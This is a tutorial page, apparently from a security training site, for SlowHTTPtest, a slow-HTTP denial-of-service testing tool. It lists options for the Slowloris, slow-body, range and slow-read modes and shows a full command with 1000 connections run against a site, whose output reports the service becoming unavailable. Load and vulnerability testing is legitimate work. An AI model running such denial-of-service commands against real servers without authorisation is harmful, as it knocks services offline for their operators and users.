SlowHTTPtest

Description

SlowHTTPtest – A tool to test for slow HTTP DoS vulnerabilities

Usage

Syntax

slowhttptest [options …]

Options

Test modes:
-H               slow headers a.k.a. Slowloris (default)
-B               slow body a.k.a R-U-Dead-Yet
-R               range attack a.k.a Apache killer
-X               slow read a.k.a Slow Read
Reporting options:
-g               generate statistics with socket state changes (off)
-o               file_prefix   save statistics output in file.html and file.csv (-g required)
-v level         verbosity level 0-4: Fatal, Info, Error, Warning, Debug
General options:
-c connections   target number of connections (50)
-i seconds       interval between followup data in seconds (10)
-l seconds       target test length in seconds (240)
-r rate          connections per seconds (50)
-s bytes         value of Content-Length header if needed (4096)
-t verb          verb to use in request,default to GET for slow headers and response and to POST for slow body
-u URL           absolute URL of target (http://localhost/)
-x bytes         max length of each randomized name/value pair of followup data per tick, e.g. -x 2 generates X-xx: xx for header or &xx=xx for body, where x is random character (32)
Probe/Proxy options:
-d host:port     all traffic directed through HTTP proxy at host:port (off)
-e host:port     probe traffic directed through HTTP proxy at host:port (off)
-p seconds       timeout to wait for HTTP response on probe connection, after which server is considered inaccessible (5)
Range attack specific options:
-a start        left boundary of range in range header (5)
-b bytes        limit for range header right boundary values (2000)
Slow read specific options:
-k num          number of times to repeat same request in the connection. Use to multiply response size if server supports persistent connections (1)
-n seconds      interval between read operations from recv buffer in seconds (1)
-w bytes        start of the range advertised window size would be picked from (1)
-y bytes        end of the range advertised window size would be picked from (512)
-z bytes        bytes to slow read from receive buffer with single read() call (5)

Example

cyborg@cyborg:~$ slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://ztrela.com/ -p 5 -l 350 -e x.x.x.x:8080 -g 
Tue Sep 15 16:41:35 2015:
Tue Sep 15 16:41:35 2015:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                       SLOW READ
number of connections:           1000
URL:                             http://ztrela.com/
verb:                            GET
receive window range:            10 - 20
pipeline factor:                 1
read rate from receive buffer:   32 bytes / 5 sec
connections per seconds:         1000
probe connection timeout:        5 seconds
test duration:                   350 seconds
using proxy:                     probe proxy at x.x.x.x:8080

Tue Sep 15 16:41:35 2015:
slow HTTP test status on 0th second:

initializing:        0
pending:             1
connected:           0
error:               0
closed:              0
service available:   YES
Tue Sep 15 16:41:40 2015:
Tue Sep 15 16:41:40 2015:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                       SLOW READ
number of connections:           1000
URL:                             http://ztrela.com/
verb:                            GET
receive window range:            10 - 20
pipeline factor:                 1
read rate from receive buffer:   32 bytes / 5 sec
connections per seconds:         1000
probe connection timeout:        5 seconds
test duration:                   350 seconds
using proxy:                     probe proxy at x.x.x.x:8080

Tue Sep 15 16:41:40 2015:
slow HTTP test status on 5th second:

initializing:        0
pending:             602
connected:           398
error:               0
closed:              0
service available:   YES
Tue Sep 15 16:41:45 2015:
Tue Sep 15 16:41:45 2015:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                       SLOW READ
number of connections:           1000
URL:                             http://ztrela.com/
verb:                            GET
receive window range:            10 - 20
pipeline factor:                 1
read rate from receive buffer:   32 bytes / 5 sec
connections per seconds:         1000
probe connection timeout:        5 seconds
test duration:                   350 seconds
using proxy:                     probe proxy at x.x.x.x:8080

Tue Sep 15 16:41:45 2015:
slow HTTP test status on 10th second:

initializing:        0
pending:             586
connected:           414
error:               0
closed:              0
service available:   NO
^CTue Sep 15 16:41:48 2015:
Test ended on 12th second
Exit status: Cancelled by user
CSV report saved to slow_164120150915.csv
HTML report saved to slow_164120150915.html


HERE ARE RESULTS GENERATED IN HTML FILE (using -g)
slowhttp SlowHTTPtest
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?